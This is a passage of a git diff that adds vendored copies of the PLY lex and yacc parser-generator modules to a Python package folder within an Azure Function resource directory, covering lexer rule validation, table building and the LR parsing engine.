self.reflags) + if c.match(''): + self.log.error("%s:%d: Regular expression for rule '%s' matches empty string", file, line, f.__name__) + self.error = True + except re.error as e: + self.log.error("%s:%d: Invalid regular expression for rule '%s'. %s", file, line, f.__name__, e) + if '#' in _get_regex(f): + self.log.error("%s:%d. Make sure '#' in rule '%s' is escaped with '\\#'", file, line, f.__name__) + self.error = True + + # Validate all rules defined by strings + for name, r in self.strsym[state]: + tokname = self.toknames[name] + if tokname == 'error': + self.log.error("Rule '%s' must be defined as a function", name) + self.error = True + continue + + if tokname not in self.tokens and tokname.find('ignore_') < 0: + self.log.error("Rule '%s' defined for an unspecified token %s", name, tokname) + self.error = True + continue + + try: + c = re.compile('(?P<%s>%s)' % (name, r), self.reflags) + if (c.match('')): + self.log.error("Regular expression for rule '%s' matches empty string", name) + self.error = True + except re.error as e: + self.log.error("Invalid regular expression for rule '%s'. %s", name, e) + if '#' in r: + self.log.error("Make sure '#' in rule '%s' is escaped with '\\#'", name) + self.error = True + + if not self.funcsym[state] and not self.strsym[state]: + self.log.error("No rules defined for state '%s'", state) + self.error = True + + # Validate the error function + efunc = self.errorf.get(state, None) + if efunc: + f = efunc + line = f.__code__.co_firstlineno + file = f.__code__.co_filename + module = inspect.getmodule(f) + self.modules.add(module) + + if isinstance(f, types.MethodType): + reqargs = 2 + else: + reqargs = 1 + nargs = f.__code__.co_argcount + if nargs > reqargs: + self.log.error("%s:%d: Rule '%s' has too many arguments", file, line, f.__name__) + self.error = True + + if nargs < reqargs: + self.log.error("%s:%d: Rule '%s' requires an argument", file, line, f.__name__) + self.error = True + + for module in self.modules: + self.validate_module(module) + + # ----------------------------------------------------------------------------- + # validate_module() + # + # This checks to see if there are duplicated t_rulename() functions or strings + # in the parser input file. This is done using a simple regular expression + # match on each line in the source code of the given module. + # ----------------------------------------------------------------------------- + + def validate_module(self, module): + try: + lines, linen = inspect.getsourcelines(module) + except IOError: + return + + fre = re.compile(r'\s*def\s+(t_[a-zA-Z_0-9]*)\(') + sre = re.compile(r'\s*(t_[a-zA-Z_0-9]*)\s*=') + + counthash = {} + linen += 1 + for line in lines: + m = fre.match(line) + if not m: + m = sre.match(line) + if m: + name = m.group(1) + prev = counthash.get(name) + if not prev: + counthash[name] = linen + else: + filename = inspect.getsourcefile(module) + self.log.error('%s:%d: Rule %s redefined. 
Previously defined on line %d', filename, linen, name, prev) + self.error = True + linen += 1 + +# ----------------------------------------------------------------------------- +# lex(module) +# +# Build all of the regular expression rules from definitions in the supplied module +# ----------------------------------------------------------------------------- +def lex(module=None, object=None, debug=False, optimize=False, lextab='lextab', + reflags=int(re.VERBOSE), nowarn=False, outputdir=None, debuglog=None, errorlog=None): + + if lextab is None: + lextab = 'lextab' + + global lexer + + ldict = None + stateinfo = {'INITIAL': 'inclusive'} + lexobj = Lexer() + lexobj.lexoptimize = optimize + global token, input + + if errorlog is None: + errorlog = PlyLogger(sys.stderr) + + if debug: + if debuglog is None: + debuglog = PlyLogger(sys.stderr) + + # Get the module dictionary used for the lexer + if object: + module = object + + # Get the module dictionary used for the parser + if module: + _items = [(k, getattr(module, k)) for k in dir(module)] + ldict = dict(_items) + # If no __file__ attribute is available, try to obtain it from the __module__ instead + if '__file__' not in ldict: + ldict['__file__'] = sys.modules[ldict['__module__']].__file__ + else: + ldict = get_caller_module_dict(2) + + # Determine if the module is package of a package or not. + # If so, fix the tabmodule setting so that tables load correctly + pkg = ldict.get('__package__') + if pkg and isinstance(lextab, str): + if '.' not in lextab: + lextab = pkg + '.' + lextab + + # Collect parser information from the dictionary + linfo = LexerReflect(ldict, log=errorlog, reflags=reflags) + linfo.get_all() + if not optimize: + if linfo.validate_all(): + raise SyntaxError("Can't build lexer") + + if optimize and lextab: + try: + lexobj.readtab(lextab, ldict) + token = lexobj.token + input = lexobj.input + lexer = lexobj + return lexobj + + except ImportError: + pass + + # Dump some basic debugging information + if debug: + debuglog.info('lex: tokens = %r', linfo.tokens) + debuglog.info('lex: literals = %r', linfo.literals) + debuglog.info('lex: states = %r', linfo.stateinfo) + + # Build a dictionary of valid token names + lexobj.lextokens = set() + for n in linfo.tokens: + lexobj.lextokens.add(n) + + # Get literals specification + if isinstance(linfo.literals, (list, tuple)): + lexobj.lexliterals = type(linfo.literals[0])().join(linfo.literals) + else: + lexobj.lexliterals = linfo.literals + + lexobj.lextokens_all = lexobj.lextokens | set(lexobj.lexliterals) + + # Get the stateinfo dictionary + stateinfo = linfo.stateinfo + + regexs = {} + # Build the master regular expressions + for state in stateinfo: + regex_list = [] + + # Add rules defined by functions first + for fname, f in linfo.funcsym[state]: + line = f.__code__.co_firstlineno + file = f.__code__.co_filename + regex_list.append('(?P<%s>%s)' % (fname, _get_regex(f))) + if debug: + debuglog.info("lex: Adding rule %s -> '%s' (state '%s')", fname, _get_regex(f), state) + + # Now add all of the simple rules + for name, r in linfo.strsym[state]: + regex_list.append('(?P<%s>%s)' % (name, r)) + if debug: + debuglog.info("lex: Adding rule %s -> '%s' (state '%s')", name, r, state) + + regexs[state] = regex_list + + # Build the master regular expressions + + if debug: + debuglog.info('lex: ==== MASTER REGEXS FOLLOW ====') + + for state in regexs: + lexre, re_text, re_names = _form_master_re(regexs[state], reflags, ldict, linfo.toknames) + lexobj.lexstatere[state] = lexre + 
lexobj.lexstateretext[state] = re_text + lexobj.lexstaterenames[state] = re_names + if debug: + for i, text in enumerate(re_text): + debuglog.info("lex: state '%s' : regex[%d] = '%s'", state, i, text) + + # For inclusive states, we need to add the regular expressions from the INITIAL state + for state, stype in stateinfo.items(): + if state != 'INITIAL' and stype == 'inclusive': + lexobj.lexstatere[state].extend(lexobj.lexstatere['INITIAL']) + lexobj.lexstateretext[state].extend(lexobj.lexstateretext['INITIAL']) + lexobj.lexstaterenames[state].extend(lexobj.lexstaterenames['INITIAL']) + + lexobj.lexstateinfo = stateinfo + lexobj.lexre = lexobj.lexstatere['INITIAL'] + lexobj.lexretext = lexobj.lexstateretext['INITIAL'] + lexobj.lexreflags = reflags + + # Set up ignore variables + lexobj.lexstateignore = linfo.ignore + lexobj.lexignore = lexobj.lexstateignore.get('INITIAL', '') + + # Set up error functions + lexobj.lexstateerrorf = linfo.errorf + lexobj.lexerrorf = linfo.errorf.get('INITIAL', None) + if not lexobj.lexerrorf: + errorlog.warning('No t_error rule is defined') + + # Set up eof functions + lexobj.lexstateeoff = linfo.eoff + lexobj.lexeoff = linfo.eoff.get('INITIAL', None) + + # Check state information for ignore and error rules + for s, stype in stateinfo.items(): + if stype == 'exclusive': + if s not in linfo.errorf: + errorlog.warning("No error rule is defined for exclusive state '%s'", s) + if s not in linfo.ignore and lexobj.lexignore: + errorlog.warning("No ignore rule is defined for exclusive state '%s'", s) + elif stype == 'inclusive': + if s not in linfo.errorf: + linfo.errorf[s] = linfo.errorf.get('INITIAL', None) + if s not in linfo.ignore: + linfo.ignore[s] = linfo.ignore.get('INITIAL', '') + + # Create global versions of the token() and input() functions + token = lexobj.token + input = lexobj.input + lexer = lexobj + + # If in optimize mode, we write the lextab + if lextab and optimize: + if outputdir is None: + # If no output directory is set, the location of the output files + # is determined according to the following rules: + # - If lextab specifies a package, files go into that package directory + # - Otherwise, files go in the same directory as the specifying module + if isinstance(lextab, types.ModuleType): + srcfile = lextab.__file__ + else: + if '.' not in lextab: + srcfile = ldict['__file__'] + else: + parts = lextab.split('.') + pkgname = '.'.join(parts[:-1]) + exec('import %s' % pkgname) + srcfile = getattr(sys.modules[pkgname], '__file__', '') + outputdir = os.path.dirname(srcfile) + try: + lexobj.writetab(lextab, outputdir) + except IOError as e: + errorlog.warning("Couldn't write lextab module %r. 
%s" % (lextab, e)) + + return lexobj + +# ----------------------------------------------------------------------------- +# runmain() +# +# This runs the lexer as a main program +# ----------------------------------------------------------------------------- + +def runmain(lexer=None, data=None): + if not data: + try: + filename = sys.argv[1] + f = open(filename) + data = f.read() + f.close() + except IndexError: + sys.stdout.write('Reading from standard input (type EOF to end):\n') + data = sys.stdin.read() + + if lexer: + _input = lexer.input + else: + _input = input + _input(data) + if lexer: + _token = lexer.token + else: + _token = token + + while True: + tok = _token() + if not tok: + break + sys.stdout.write('(%s,%r,%d,%d)\n' % (tok.type, tok.value, tok.lineno, tok.lexpos)) + +# ----------------------------------------------------------------------------- +# @TOKEN(regex) +# +# This decorator function can be used to set the regex expression on a function +# when its docstring might need to be set in an alternative way +# ----------------------------------------------------------------------------- + +def TOKEN(r): + def set_regex(f): + if hasattr(r, '__call__'): + f.regex = _get_regex(r) + else: + f.regex = r + return f + return set_regex + +# Alternative spelling of the TOKEN decorator +Token = TOKEN diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/yacc.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/yacc.py new file mode 100644 index 0000000..18c9a75 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/yacc.py @@ -0,0 +1,3494 @@ +# ----------------------------------------------------------------------------- +# ply: yacc.py +# +# Copyright (C) 2001-2017 +# David M. Beazley (Dabeaz LLC) +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are +# met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the David Beazley or Dabeaz LLC may be used to +# endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
+# -----------------------------------------------------------------------------
+#
+# This implements an LR parser that is constructed from grammar rules defined
+# as Python functions. The grammar is specified by supplying the BNF inside
+# Python documentation strings. The inspiration for this technique was borrowed
+# from John Aycock's Spark parsing system. PLY might be viewed as a cross between
+# Spark and the GNU bison utility.
+#
+# The current implementation is only somewhat object-oriented. The
+# LR parser itself is defined in terms of an object (which allows multiple
+# parsers to co-exist). However, most of the variables used during table
+# construction are defined in terms of global variables. Users shouldn't
+# notice unless they are trying to define multiple parsers at the same
+# time using threads (in which case they should have their head examined).
+#
+# This implementation supports both SLR and LALR(1) parsing. LALR(1)
+# support was originally implemented by Elias Ioup (ezioup@alumni.uchicago.edu),
+# using the algorithm found in Aho, Sethi, and Ullman "Compilers: Principles,
+# Techniques, and Tools" (The Dragon Book). LALR(1) has since been replaced
+# by the more efficient DeRemer and Pennello algorithm.
+#
+# :::::::: WARNING ::::::::
+#
+# Construction of LR parsing tables is fairly complicated and expensive.
+# To make this module run fast, a *LOT* of work has been put into
+# optimization---often at the expense of readability and what one might
+# consider to be good Python "coding style." Modify the code at your
+# own risk!
+# ----------------------------------------------------------------------------
+
+import re
+import types
+import sys
+import os.path
+import inspect
+import base64
+import warnings
+
+__version__ = '3.10'
+__tabversion__ = '3.10'
+
+#-----------------------------------------------------------------------------
+# === User configurable parameters ===
+#
+# Change these to modify the default behavior of yacc (if you wish)
+#-----------------------------------------------------------------------------
+
+yaccdebug = True # Debugging mode. If set, yacc generates
+ # a 'parser.out' file in the current directory
+
+debug_file = 'parser.out' # Default name of the debugging file
+tab_module = 'parsetab' # Default name of the table module
+default_lr = 'LALR' # Default LR table generation method
+
+error_count = 3 # Number of symbols that must be shifted to leave recovery mode
+
+yaccdevel = False # Set to True if developing yacc. This turns off optimized
+ # implementations of certain functions.
+
+resultlimit = 40 # Size limit of results when running in debug mode.
+
+pickle_protocol = 0 # Protocol to use when writing pickle files
+
+# String type-checking compatibility
+if sys.version_info[0] < 3:
+    string_types = basestring
+else:
+    string_types = str
+
+MAXINT = sys.maxsize
+
+# This object is a stand-in for a logging object created by the
+# logging module. PLY will use this by default to create things
+# such as the parser.out file. If a user wants more detailed
+# information, they can create their own logging object and pass
+# it into PLY.
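+#
+# A minimal sketch of that usage, assuming only the standard logging module:
+#
+#     >>> import logging
+#     >>> logging.basicConfig(level=logging.DEBUG, filename='parselog.txt')
+#     >>> log = logging.getLogger()
+#     >>> # parser = yacc.yacc(debug=True, debuglog=log, errorlog=log)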
+ +class PlyLogger(object): + def __init__(self, f): + self.f = f + + def debug(self, msg, *args, **kwargs): + self.f.write((msg % args) + '\n') + + info = debug + + def warning(self, msg, *args, **kwargs): + self.f.write('WARNING: ' + (msg % args) + '\n') + + def error(self, msg, *args, **kwargs): + self.f.write('ERROR: ' + (msg % args) + '\n') + + critical = debug + +# Null logger is used when no output is generated. Does nothing. +class NullLogger(object): + def __getattribute__(self, name): + return self + + def __call__(self, *args, **kwargs): + return self + +# Exception raised for yacc-related errors +class YaccError(Exception): + pass + +# Format the result message that the parser produces when running in debug mode. +def format_result(r): + repr_str = repr(r) + if '\n' in repr_str: + repr_str = repr(repr_str) + if len(repr_str) > resultlimit: + repr_str = repr_str[:resultlimit] + ' ...' + result = '<%s @ 0x%x> (%s)' % (type(r).__name__, id(r), repr_str) + return result + +# Format stack entries when the parser is running in debug mode +def format_stack_entry(r): + repr_str = repr(r) + if '\n' in repr_str: + repr_str = repr(repr_str) + if len(repr_str) < 16: + return repr_str + else: + return '<%s @ 0x%x>' % (type(r).__name__, id(r)) + +# Panic mode error recovery support. This feature is being reworked--much of the +# code here is to offer a deprecation/backwards compatible transition + +_errok = None +_token = None +_restart = None +_warnmsg = '''PLY: Don't use global functions errok(), token(), and restart() in p_error(). +Instead, invoke the methods on the associated parser instance: + + def p_error(p): + ... + # Use parser.errok(), parser.token(), parser.restart() + ... + + parser = yacc.yacc() +''' + +def errok(): + warnings.warn(_warnmsg) + return _errok() + +def restart(): + warnings.warn(_warnmsg) + return _restart() + +def token(): + warnings.warn(_warnmsg) + return _token() + +# Utility function to call the p_error() function with some deprecation hacks +def call_errorfunc(errorfunc, token, parser): + global _errok, _token, _restart + _errok = parser.errok + _token = parser.token + _restart = parser.restart + r = errorfunc(token) + try: + del _errok, _token, _restart + except NameError: + pass + return r + +#----------------------------------------------------------------------------- +# === LR Parsing Engine === +# +# The following classes are used for the LR parser itself. These are not +# used during table construction and are independent of the actual LR +# table generation algorithm +#----------------------------------------------------------------------------- + +# This class is used to hold non-terminal grammar symbols during parsing. +# It normally has the following attributes set: +# .type = Grammar symbol type +# .value = Symbol value +# .lineno = Starting line number +# .endlineno = Ending line number (optional, set automatically) +# .lexpos = Starting lex position +# .endlexpos = Ending lex position (optional, set automatically) + +class YaccSymbol: + def __str__(self): + return self.type + + def __repr__(self): + return str(self) + +# This class is a wrapper around the objects actually passed to each +# grammar rule. Index lookup and assignment actually assign the +# .value attribute of the underlying YaccSymbol object. +# The lineno() method returns the line number of a given +# item (or 0 if not defined). The linespan() method returns +# a tuple of (startline,endline) representing the range of lines +# for a symbol. 
The lexspan() method returns a tuple (lexpos,endlexpos) +# representing the range of positional information for a symbol. + +class YaccProduction: + def __init__(self, s, stack=None): + self.slice = s + self.stack = stack + self.lexer = None + self.parser = None + + def __getitem__(self, n): + if isinstance(n, slice): + return [s.value for s in self.slice[n]] + elif n >= 0: + return self.slice[n].value + else: + return self.stack[n].value + + def __setitem__(self, n, v): + self.slice[n].value = v + + def __getslice__(self, i, j): + return [s.value for s in self.slice[i:j]] + + def __len__(self): + return len(self.slice) + + def lineno(self, n): + return getattr(self.slice[n], 'lineno', 0) + + def set_lineno(self, n, lineno): + self.slice[n].lineno = lineno + + def linespan(self, n): + startline = getattr(self.slice[n], 'lineno', 0) + endline = getattr(self.slice[n], 'endlineno', startline) + return startline, endline + + def lexpos(self, n): + return getattr(self.slice[n], 'lexpos', 0) + + def lexspan(self, n): + startpos = getattr(self.slice[n], 'lexpos', 0) + endpos = getattr(self.slice[n], 'endlexpos', startpos) + return startpos, endpos + + def error(self): + raise SyntaxError + +# ----------------------------------------------------------------------------- +# == LRParser == +# +# The LR Parsing engine. +# ----------------------------------------------------------------------------- + +class LRParser: + def __init__(self, lrtab, errorf): + self.productions = lrtab.lr_productions + self.action = lrtab.lr_action + self.goto = lrtab.lr_goto + self.errorfunc = errorf + self.set_defaulted_states() + self.errorok = True + + def errok(self): + self.errorok = True + + def restart(self): + del self.statestack[:] + del self.symstack[:] + sym = YaccSymbol() + sym.type = '$end' + self.symstack.append(sym) + self.statestack.append(0) + + # Defaulted state support. + # This method identifies parser states where there is only one possible reduction action. + # For such states, the parser can make a choose to make a rule reduction without consuming + # the next look-ahead token. This delayed invocation of the tokenizer can be useful in + # certain kinds of advanced parsing situations where the lexer and parser interact with + # each other or change states (i.e., manipulation of scope, lexer states, etc.). + # + # See: https://www.gnu.org/software/bison/manual/html_node/Default-Reductions.html#Default-Reductions + def set_defaulted_states(self): + self.defaulted_states = {} + for state, actions in self.action.items(): + rules = list(actions.values()) + if len(rules) == 1 and rules[0] < 0: + self.defaulted_states[state] = rules[0] + + def disable_defaulted_states(self): + self.defaulted_states = {} + + def parse(self, input=None, lexer=None, debug=False, tracking=False, tokenfunc=None): + if debug or yaccdevel: + if isinstance(debug, int): + debug = PlyLogger(sys.stderr) + return self.parsedebug(input, lexer, debug, tracking, tokenfunc) + elif tracking: + return self.parseopt(input, lexer, debug, tracking, tokenfunc) + else: + return self.parseopt_notrack(input, lexer, debug, tracking, tokenfunc) + + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # parsedebug(). + # + # This is the debugging enabled version of parse(). All changes made to the + # parsing engine should be made here. Optimized versions of this function + # are automatically created by the ply/ygen.py script. This script cuts out + # sections enclosed in markers such as this: + # + # #--! 
DEBUG + # statements + # #--! DEBUG + # + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + def parsedebug(self, input=None, lexer=None, debug=False, tracking=False, tokenfunc=None): + #--! parsedebug-start + lookahead = None # Current lookahead symbol + lookaheadstack = [] # Stack of lookahead symbols + actions = self.action # Local reference to action table (to avoid lookup on self.) + goto = self.goto # Local reference to goto table (to avoid lookup on self.) + prod = self.productions # Local reference to production list (to avoid lookup on self.) + defaulted_states = self.defaulted_states # Local reference to defaulted states + pslice = YaccProduction(None) # Production object passed to grammar rules + errorcount = 0 # Used during error recovery + + #--! DEBUG + debug.info('PLY: PARSE DEBUG START') + #--! DEBUG + + # If no lexer was given, we will try to use the lex module + if not lexer: + from . import lex + lexer = lex.lexer + + # Set up the lexer and parser objects on pslice + pslice.lexer = lexer + pslice.parser = self + + # If input was supplied, pass to lexer + if input is not None: + lexer.input(input) + + if tokenfunc is None: + # Tokenize function + get_token = lexer.token + else: + get_token = tokenfunc + + # Set the parser() token method (sometimes used in error recovery) + self.token = get_token + + # Set up the state and symbol stacks + + statestack = [] # Stack of parsing states + self.statestack = statestack + symstack = [] # Stack of grammar symbols + self.symstack = symstack + + pslice.stack = symstack # Put in the production + errtoken = None # Err token + + # The start state is assumed to be (0,$end) + + statestack.append(0) + sym = YaccSymbol() + sym.type = '$end' + symstack.append(sym) + state = 0 + while True: + # Get the next symbol on the input. If a lookahead symbol + # is already set, we just use that. Otherwise, we'll pull + # the next token off of the lookaheadstack or from the lexer + + #--! DEBUG + debug.debug('') + debug.debug('State : %s', state) + #--! DEBUG + + if state not in defaulted_states: + if not lookahead: + if not lookaheadstack: + lookahead = get_token() # Get the next token + else: + lookahead = lookaheadstack.pop() + if not lookahead: + lookahead = YaccSymbol() + lookahead.type = '$end' + + # Check the action table + ltype = lookahead.type + t = actions[state].get(ltype) + else: + t = defaulted_states[state] + #--! DEBUG + debug.debug('Defaulted state %s: Reduce using %d', state, -t) + #--! DEBUG + + #--! DEBUG + debug.debug('Stack : %s', + ('%s . %s' % (' '.join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip()) + #--! DEBUG + + if t is not None: + if t > 0: + # shift a symbol on the stack + statestack.append(t) + state = t + + #--! DEBUG + debug.debug('Action : Shift and goto state %s', t) + #--! DEBUG + + symstack.append(lookahead) + lookahead = None + + # Decrease error count on successful shift + if errorcount: + errorcount -= 1 + continue + + if t < 0: + # reduce a symbol on the stack, emit a production + p = prod[-t] + pname = p.name + plen = p.len + + # Get production function + sym = YaccSymbol() + sym.type = pname # Production name + sym.value = None + + #--! 
DEBUG + if plen: + debug.info('Action : Reduce rule [%s] with %s and goto state %d', p.str, + '['+','.join([format_stack_entry(_v.value) for _v in symstack[-plen:]])+']', + goto[statestack[-1-plen]][pname]) + else: + debug.info('Action : Reduce rule [%s] with %s and goto state %d', p.str, [], + goto[statestack[-1]][pname]) + + #--! DEBUG + + if plen: + targ = symstack[-plen-1:] + targ[0] = sym + + #--! TRACKING + if tracking: + t1 = targ[1] + sym.lineno = t1.lineno + sym.lexpos = t1.lexpos + t1 = targ[-1] + sym.endlineno = getattr(t1, 'endlineno', t1.lineno) + sym.endlexpos = getattr(t1, 'endlexpos', t1.lexpos) + #--! TRACKING + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # below as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + del symstack[-plen:] + self.state = state + p.callable(pslice) + del statestack[-plen:] + #--! DEBUG + debug.info('Result : %s', format_result(pslice[0])) + #--! DEBUG + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + symstack.extend(targ[1:-1]) # Put the production slice back on the stack + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + else: + + #--! TRACKING + if tracking: + sym.lineno = lexer.lineno + sym.lexpos = lexer.lexpos + #--! TRACKING + + targ = [sym] + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # above as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + self.state = state + p.callable(pslice) + #--! DEBUG + debug.info('Result : %s', format_result(pslice[0])) + #--! DEBUG + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + if t == 0: + n = symstack[-1] + result = getattr(n, 'value', None) + #--! DEBUG + debug.info('Done : Returning %s', format_result(result)) + debug.info('PLY: PARSE DEBUG END') + #--! DEBUG + return result + + if t is None: + + #--! DEBUG + debug.error('Error : %s', + ('%s . %s' % (' '.join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip()) + #--! DEBUG + + # We have some kind of parsing error here. To handle + # this, we are going to push the current token onto + # the tokenstack and replace it with an 'error' token. + # If there are any synchronization rules, they may + # catch it. + # + # In addition to pushing the error token, we call call + # the user defined p_error() function if this is the + # first syntax error. This function is only called if + # errorcount == 0. 
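+                # A typical user-supplied p_error() looks roughly like the
+                # following (a hypothetical sketch, not part of this module):
+                #
+                #     def p_error(p):
+                #         if p:
+                #             print("Syntax error at token", p.type)
+                #             parser.errok()      # resume normal parsing
+                #         else:
+                #             print("Syntax error at EOF")
+                #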
+ if errorcount == 0 or self.errorok: + errorcount = error_count + self.errorok = False + errtoken = lookahead + if errtoken.type == '$end': + errtoken = None # End of file! + if self.errorfunc: + if errtoken and not hasattr(errtoken, 'lexer'): + errtoken.lexer = lexer + self.state = state + tok = call_errorfunc(self.errorfunc, errtoken, self) + if self.errorok: + # User must have done some kind of panic + # mode recovery on their own. The + # returned token is the next lookahead + lookahead = tok + errtoken = None + continue + else: + if errtoken: + if hasattr(errtoken, 'lineno'): + lineno = lookahead.lineno + else: + lineno = 0 + if lineno: + sys.stderr.write('yacc: Syntax error at line %d, token=%s\n' % (lineno, errtoken.type)) + else: + sys.stderr.write('yacc: Syntax error, token=%s' % errtoken.type) + else: + sys.stderr.write('yacc: Parse error in input. EOF\n') + return + + else: + errorcount = error_count + + # case 1: the statestack only has 1 entry on it. If we're in this state, the + # entire parse has been rolled back and we're completely hosed. The token is + # discarded and we just keep going. + + if len(statestack) <= 1 and lookahead.type != '$end': + lookahead = None + errtoken = None + state = 0 + # Nuke the pushback stack + del lookaheadstack[:] + continue + + # case 2: the statestack has a couple of entries on it, but we're + # at the end of the file. nuke the top entry and generate an error token + + # Start nuking entries on the stack + if lookahead.type == '$end': + # Whoa. We're really hosed here. Bail out + return + + if lookahead.type != 'error': + sym = symstack[-1] + if sym.type == 'error': + # Hmmm. Error is on top of stack, we'll just nuke input + # symbol and continue + #--! TRACKING + if tracking: + sym.endlineno = getattr(lookahead, 'lineno', sym.lineno) + sym.endlexpos = getattr(lookahead, 'lexpos', sym.lexpos) + #--! TRACKING + lookahead = None + continue + + # Create the error symbol for the first time and make it the new lookahead symbol + t = YaccSymbol() + t.type = 'error' + + if hasattr(lookahead, 'lineno'): + t.lineno = t.endlineno = lookahead.lineno + if hasattr(lookahead, 'lexpos'): + t.lexpos = t.endlexpos = lookahead.lexpos + t.value = lookahead + lookaheadstack.append(lookahead) + lookahead = t + else: + sym = symstack.pop() + #--! TRACKING + if tracking: + lookahead.lineno = sym.lineno + lookahead.lexpos = sym.lexpos + #--! TRACKING + statestack.pop() + state = statestack[-1] + + continue + + # Call an error function here + raise RuntimeError('yacc: internal parser error!!!\n') + + #--! parsedebug-end + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # parseopt(). + # + # Optimized version of parse() method. DO NOT EDIT THIS CODE DIRECTLY! + # This code is automatically generated by the ply/ygen.py script. Make + # changes to the parsedebug() method instead. + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + def parseopt(self, input=None, lexer=None, debug=False, tracking=False, tokenfunc=None): + #--! parseopt-start + lookahead = None # Current lookahead symbol + lookaheadstack = [] # Stack of lookahead symbols + actions = self.action # Local reference to action table (to avoid lookup on self.) + goto = self.goto # Local reference to goto table (to avoid lookup on self.) + prod = self.productions # Local reference to production list (to avoid lookup on self.) 
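+        # (Caching the tables above in locals is a deliberate CPython
+        # micro-optimization: local variable loads are far cheaper than
+        # repeated attribute lookups on self inside the hot parse loop.)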
+ defaulted_states = self.defaulted_states # Local reference to defaulted states + pslice = YaccProduction(None) # Production object passed to grammar rules + errorcount = 0 # Used during error recovery + + + # If no lexer was given, we will try to use the lex module + if not lexer: + from . import lex + lexer = lex.lexer + + # Set up the lexer and parser objects on pslice + pslice.lexer = lexer + pslice.parser = self + + # If input was supplied, pass to lexer + if input is not None: + lexer.input(input) + + if tokenfunc is None: + # Tokenize function + get_token = lexer.token + else: + get_token = tokenfunc + + # Set the parser() token method (sometimes used in error recovery) + self.token = get_token + + # Set up the state and symbol stacks + + statestack = [] # Stack of parsing states + self.statestack = statestack + symstack = [] # Stack of grammar symbols + self.symstack = symstack + + pslice.stack = symstack # Put in the production + errtoken = None # Err token + + # The start state is assumed to be (0,$end) + + statestack.append(0) + sym = YaccSymbol() + sym.type = '$end' + symstack.append(sym) + state = 0 + while True: + # Get the next symbol on the input. If a lookahead symbol + # is already set, we just use that. Otherwise, we'll pull + # the next token off of the lookaheadstack or from the lexer + + + if state not in defaulted_states: + if not lookahead: + if not lookaheadstack: + lookahead = get_token() # Get the next token + else: + lookahead = lookaheadstack.pop() + if not lookahead: + lookahead = YaccSymbol() + lookahead.type = '$end' + + # Check the action table + ltype = lookahead.type + t = actions[state].get(ltype) + else: + t = defaulted_states[state] + + + if t is not None: + if t > 0: + # shift a symbol on the stack + statestack.append(t) + state = t + + + symstack.append(lookahead) + lookahead = None + + # Decrease error count on successful shift + if errorcount: + errorcount -= 1 + continue + + if t < 0: + # reduce a symbol on the stack, emit a production + p = prod[-t] + pname = p.name + plen = p.len + + # Get production function + sym = YaccSymbol() + sym.type = pname # Production name + sym.value = None + + + if plen: + targ = symstack[-plen-1:] + targ[0] = sym + + #--! TRACKING + if tracking: + t1 = targ[1] + sym.lineno = t1.lineno + sym.lexpos = t1.lexpos + t1 = targ[-1] + sym.endlineno = getattr(t1, 'endlineno', t1.lineno) + sym.endlexpos = getattr(t1, 